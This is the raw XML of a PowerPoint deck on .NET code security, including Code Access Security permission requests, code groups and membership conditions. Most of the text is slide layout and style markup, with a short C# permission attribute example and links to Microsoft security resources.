          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
            <a:endParaRPr lang="es-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="107950" y="1584325"/>
            <a:ext cx="4381500" cy="2214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
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4641850" y="1584325"/>
            <a:ext cx="4381500" cy="1030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
        <p:nvSpPr>
          <p:cNvPr id="5" name="Content Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4641850" y="2767013"/>
            <a:ext cx="4381500" cy="1031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7000" y="127000"/>
            <a:ext cx="8870950" cy="695325"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
            <a:endParaRPr lang="es-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Table Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="tbl" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="107950" y="1584325"/>
            <a:ext cx="8915400" cy="2214563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="es-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7000" y="127000"/>
            <a:ext cx="8870950" cy="695325"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
            <a:endParaRPr lang="es-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="107950" y="1584325"/>
            <a:ext cx="4381500" cy="2214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
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4641850" y="1584325"/>
            <a:ext cx="4381500" cy="2214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s-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US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="107950" y="1584325"/>
            <a:ext cx="4381500" cy="221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
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4641850" y="1584325"/>
            <a:ext cx="4381500" cy="221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000" y="127000"/>
            <a:ext cx="8870950" cy="6953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GB" smtClean="0"/>
              <a:t>Click to edit Title Slide</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1032" name="Rectangle 8"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="107950" y="1584325"/>
            <a:ext cx="8915400" cy="2214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p:timing>
    <p:tnLst>
      <p:par>
        <p:cTn id="1" dur="indefinite" restart="never" nodeType="tmRoot"/>
      </p:par>
    </p:tnLst>
  </p:timing>
  <p:txStyles>
    <p:titleStyle>
      <a:lvl1pPr algn="l" rtl="0" fontAlgn="base">
        <a:lnSpc>
          <a:spcPct val="90000"/>
        </a:lnSpc>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fontAlgn="base">
        <a:lnSpc>
          <a:spcPct val="90000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="4400">
          <a:solidFill>
            <a:schemeClr val="tx2"/>
          </a:solidFill>
          <a:effectLst>
            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
              <a:srgbClr val="000000"/>
            </a:outerShdw>
          </a:effectLst>
          <a:latin typeface="Franklin Gothic Medium" pitchFamily="34" charset="0"/>
        </a:defRPr>
      </a:lvl2pPr>
      <a:lvl3pPr algn="l" rtl="0" fontAlgn="base">
        <a:lnSpc>
          <a:spcPct val="90000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="4400">
          <a:solidFill>
            <a:schemeClr val="tx2"/>
          </a:solidFill>
          <a:effectLst>
            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
              <a:srgbClr val="000000"/>
            </a:outerShdw>
          </a:effectLst>
          <a:latin typeface="Franklin Gothic Medium" pitchFamily="34" charset="0"/>
        </a:defRPr>
      </a:lvl3pPr>
      <a:lvl4pPr algn="l" rtl="0" fontAlgn="base">
        <a:lnSpc>
          <a:spcPct val="90000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="4400">
          <a:solidFill>
            <a:schemeClr val="tx2"/>
          </a:solidFill>
          <a:effectLst>
            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
              <a:srgbClr val="000000"/>
            </a:outerShdw>
          </a:effectLst>
          <a:latin typeface="Franklin Gothic Medium" pitchFamily="34" charset="0"/>
        </a:defRPr>
      </a:lvl4pPr>
      <a:lvl5pPr algn="l" rtl="0" fontAlgn="base">
        <a:lnSpc>
          <a:spcPct val="90000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="4400">
          <a:solidFill>
            <a:schemeClr val="tx2"/>
          </a:solidFill>
          <a:effectLst>
            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
              <a:srgbClr val="000000"/>
            </a:outerShdw>
          </a:effectLst>
          <a:latin typeface="Franklin Gothic Medium" pitchFamily="34" charset="0"/>
        </a:defRPr>
      </a:lvl5pPr>
      <a:lvl6pPr marL="457200" algn="l" rtl="0" fontAlgn="base">
        <a:lnSpc>
          <a:spcPct val="90000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="4400">
          <a:solidFill>
            <a:schemeClr val="tx2"/>
          </a:solidFill>
          <a:effectLst>
            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
              <a:srgbClr val="000000"/>
            </a:outerShdw>
          </a:effectLst>
          <a:latin typeface="Franklin Gothic Medium" pitchFamily="34" charset="0"/>
        </a:defRPr>
      </a:lvl6pPr>
      <a:lvl7pPr marL="914400" algn="l" rtl="0" fontAlgn="base">
        <a:lnSpc>
          <a:spcPct val="90000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="4400">
          <a:solidFill>
            <a:schemeClr val="tx2"/>
          </a:solidFill>
          <a:effectLst>
            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
              <a:srgbClr val="000000"/>
            </a:outerShdw>
          </a:effectLst>
          <a:latin typeface="Franklin Gothic Medium" pitchFamily="34" charset="0"/>
        </a:defRPr>
      </a:lvl7pPr>
      <a:lvl8pPr marL="1371600" algn="l" rtl="0" fontAlgn="base">
        <a:lnSpc>
          <a:spcPct val="90000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="4400">
          <a:solidFill>
            <a:schemeClr val="tx2"/>
          </a:solidFill>
          <a:effectLst>
            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
              <a:srgbClr val="000000"/>
            </a:outerShdw>
          </a:effectLst>
          <a:latin typeface="Franklin Gothic Medium" pitchFamily="34" charset="0"/>
        </a:defRPr>
      </a:lvl8pPr>
      <a:lvl9pPr marL="1828800" algn="l" rtl="0" fontAlgn="base">
        <a:lnSpc>
          <a:spcPct val="90000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="4400">
          <a:solidFill>
            <a:schemeClr val="tx2"/>
          </a:solidFill>
          <a:effectLst>
            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
              <a:srgbClr val="000000"/>
            </a:outerShdw>
          </a:effectLst>
          <a:latin typeface="Franklin Gothic Medium" pitchFamily="34" charset="0"/>
        </a:defRPr>
      </a:lvl9pPr>
    </p:titleStyle>
    <p:bodyStyle>
      <a:lvl1pPr marL="460375" indent="-460375" algn="l" rtl="0" fontAlgn="base">
        <a:lnSpc>
          <a:spcPct val="90000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPct val="30000"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:buClr>
          <a:schemeClr val="tx2"/>
        </a:buClr>
        <a:buSzPct val="55000"/>
        <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
        <a:buBlip>
          <a:blip r:embed="rId17"/>
        </a:buBlip>
        <a:defRPr sz="3200">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:effectLst>
            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
              <a:srgbClr val="000000"/>
            </a:outerShdw>
          </a:effectLst>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl1pPr>
      <a:lvl2pPr marL="855663" indent="-393700" algn="l" rtl="0" fontAlgn="base">
        <a:lnSpc>
          <a:spcPct val="90000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPct val="30000"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:buClr>
          <a:schemeClr val="tx2"/>
        </a:buClr>
        <a:buSzPct val="55000"/>
        <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
        <a:buBlip>
          <a:blip r:embed="rId17"/>
        </a:buBlip>
        <a:defRPr sz="2800">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:effectLst>
            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
              <a:srgbClr val="000000"/>
            </a:outerShdw>
          </a:effectLst>
          <a:latin typeface="+mn-lt"/>
        </a:defRPr>
      </a:lvl2pPr>
      <a:lvl3pPr marL="1258888" indent="-401638" algn="l" rtl="0" fontAlgn="base">
        <a:lnSpc>
          <a:spcPct val="90000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPct val="30000"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:buClr>
          <a:schemeClr val="tx2"/>
        </a:buClr>
        <a:buSzPct val="55000"/>
        <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
        <a:buBlip>
          <a:blip r:embed="rId17"/>
        </a:buBlip>
        <a:defRPr sz="2400">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:effectLst>
            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
              <a:srgbClr val="000000"/>
            </a:outerShdw>
          </a:effectLst>
          <a:latin typeface="+mn-lt"/>
        </a:defRPr>
      </a:lvl3pPr>
      <a:lvl4pPr marL="1595438" indent="-334963" algn="l" rtl="0" fontAlgn="base">
        <a:lnSpc>
          <a:spcPct val="90000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPct val="30000"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:buClr>
          <a:schemeClr val="tx2"/>
        </a:buClr>
        <a:buSzPct val="55000"/>
        <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
        <a:buBlip>
          <a:blip r:embed="rId17"/>
        </a:buBlip>
        <a:defRPr sz="2000">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:effectLst>
            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
              <a:srgbClr val="000000"/>
            </a:outerShdw>
          </a:effectLst>
          <a:latin typeface="+mn-lt"/>
        </a:defRPr>
      </a:lvl4pPr>
      <a:lvl5pPr marL="1909763" indent="-300038" algn="l" rtl="0" fontAlgn="base">
        <a:lnSpc>
          <a:spcPct val="90000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPct val="30000"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:buClr>
          <a:schemeClr val="tx2"/>
        </a:buClr>
        <a:buSzPct val="55000"/>
        <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
        <a:buBlip>
          <a:blip r:embed="rId17"/>
        </a:buBlip>
        <a:defRPr sz="2000">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:effectLst>
            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
              <a:srgbClr val="000000"/>
            </a:outerShdw>
          </a:effectLst>
          <a:latin typeface="+mn-lt"/>
        </a:defRPr>
      </a:lvl5pPr>
      <a:lvl6pPr marL="2366963" indent="-300038" algn="l" rtl="0" fontAlgn="base">
        <a:lnSpc>
          <a:spcPct val="90000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPct val="30000"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:buClr>
          <a:schemeClr val="tx2"/>
        </a:buClr>
        <a:buSzPct val="55000"/>
        <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
        <a:buBlip>
          <a:blip r:embed="rId17"/>
        </a:buBlip>
        <a:defRPr sz="2000">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:effectLst>
            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
              <a:srgbClr val="000000"/>
            </a:outerShdw>
          </a:effectLst>
          <a:latin typeface="+mn-lt"/>
        </a:defRPr>
      </a:lvl6pPr>
      <a:lvl7pPr marL="2824163" indent="-300038" algn="l" rtl="0" fontAlgn="base">
        <a:lnSpc>
          <a:spcPct val="90000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPct val="30000"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:buClr>
          <a:schemeClr val="tx2"/>
        </a:buClr>
        <a:buSzPct val="55000"/>
        <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
        <a:buBlip>
          <a:blip r:embed="rId17"/>
        </a:buBlip>
        <a:defRPr sz="2000">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:effectLst>
            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
              <a:srgbClr val="000000"/>
            </a:outerShdw>
          </a:effectLst>
          <a:latin typeface="+mn-lt"/>
        </a:defRPr>
      </a:lvl7pPr>
      <a:lvl8pPr marL="3281363" indent="-300038" algn="l" rtl="0" fontAlgn="base">
        <a:lnSpc>
          <a:spcPct val="90000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPct val="30000"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:buClr>
          <a:schemeClr val="tx2"/>
        </a:buClr>
        <a:buSzPct val="55000"/>
        <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
        <a:buBlip>
          <a:blip r:embed="rId17"/>
        </a:buBlip>
        <a:defRPr sz="2000">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:effectLst>
            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
              <a:srgbClr val="000000"/>
            </a:outerShdw>
          </a:effectLst>
          <a:latin typeface="+mn-lt"/>
        </a:defRPr>
      </a:lvl8pPr>
      <a:lvl9pPr marL="3738563" indent="-300038" algn="l" rtl="0" fontAlgn="base">
        <a:lnSpc>
          <a:spcPct val="90000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPct val="30000"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:buClr>
          <a:schemeClr val="tx2"/>
        </a:buClr>
        <a:buSzPct val="55000"/>
        <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
        <a:buBlip>
          <a:blip r:embed="rId17"/>
        </a:buBlip>
        <a:defRPr sz="2000">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:effectLst>
            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
              <a:srgbClr val="000000"/>
            </a:outerShdw>
          </a:effectLst>
          <a:latin typeface="+mn-lt"/>
        </a:defRPr>
      </a:lvl9pPr>
    </p:bodyStyle>
    <p:otherStyle>
      <a:defPPr>
        <a:defRPr lang="es-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blogs.msdn.com/shawnfa/archive/2009/06/12/clr-v4-security-policy-roundup.asp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www.microsoft.com/downloads/details.aspx?familyid=9AEAA970-F281-4FB0-ABA1-D59D7ED09772&amp;displaylang=en"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microsoft.com/downloads/details.aspx?familyid=0178E2EF-9DA8-445E-9348-C93F24CC9F9D&amp;displaylang=en"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file:///C:\data\Microsoft\ISM%20Role\Articles\Security\XSS_Attack_FAQ.pdf"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microsoft.com/security/security_bulletins/alerts2.asp"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www.microsoft.com/learning/" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.microsoft.com/seminar/events/security.mspx" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.microsoft.com/security/guidance/"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www.microsoft.com/security"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hyperlink" Target="http://www.microsoft.com/technet/security" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://msdn.microsoft.com/security"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ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="384175" y="1345123"/>
            <a:ext cx="7772400" cy="1338828"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>.NET Code security</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0" smtClean="0"/>
              <a:t>including 4.0 &amp; Tools</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="141315" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="384175" y="4578275"/>
            <a:ext cx="7861300" cy="1089529"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Jon C. Arce</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Jonarce@microsoft.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="141316" name="Picture 4" descr="MSDN logo reverse"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6588125" y="5549900"/>
            <a:ext cx="2555875" cy="1308100"/>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97" name="Rectangle 21"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Permission Requests</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="203798" name="Rectangle 22"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Used by developers to state required permissions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Implemented by attributes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Prevents an assembly from loading when minimum permissions are not available</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="203796" name="Rectangle 20"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="698500" y="4594225"/>
            <a:ext cx="7942263" cy="1219200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="folHlink">
              <a:alpha val="75000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln w="28575">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Typewriter" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>//I will only run if I can call unmanaged code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Lucida Sans Typewriter" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[assembly:SecurityPermission</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Lucida Sans Typewriter" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>   (SecurityAction.RequestMinimum,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Lucida Sans Typewriter" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>   UnmanagedCode=true)]</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code group</a:t>
            </a:r>
            <a:endParaRPr lang="es-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="228600" y="5969713"/>
            <a:ext cx="8915400" cy="535531"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Control Panel</a:t>
            </a:r>
            <a:endParaRPr lang="es-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="478210" name="Picture 2" descr="http://assets.devx.com/articlefigs/10147.jpg"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2202348" y="964163"/>
            <a:ext cx="4562475" cy="4448175"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>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Specify Membership Condition</a:t>
            </a:r>
            <a:endParaRPr lang="es-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="228600" y="5969713"/>
            <a:ext cx="8915400" cy="535531"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
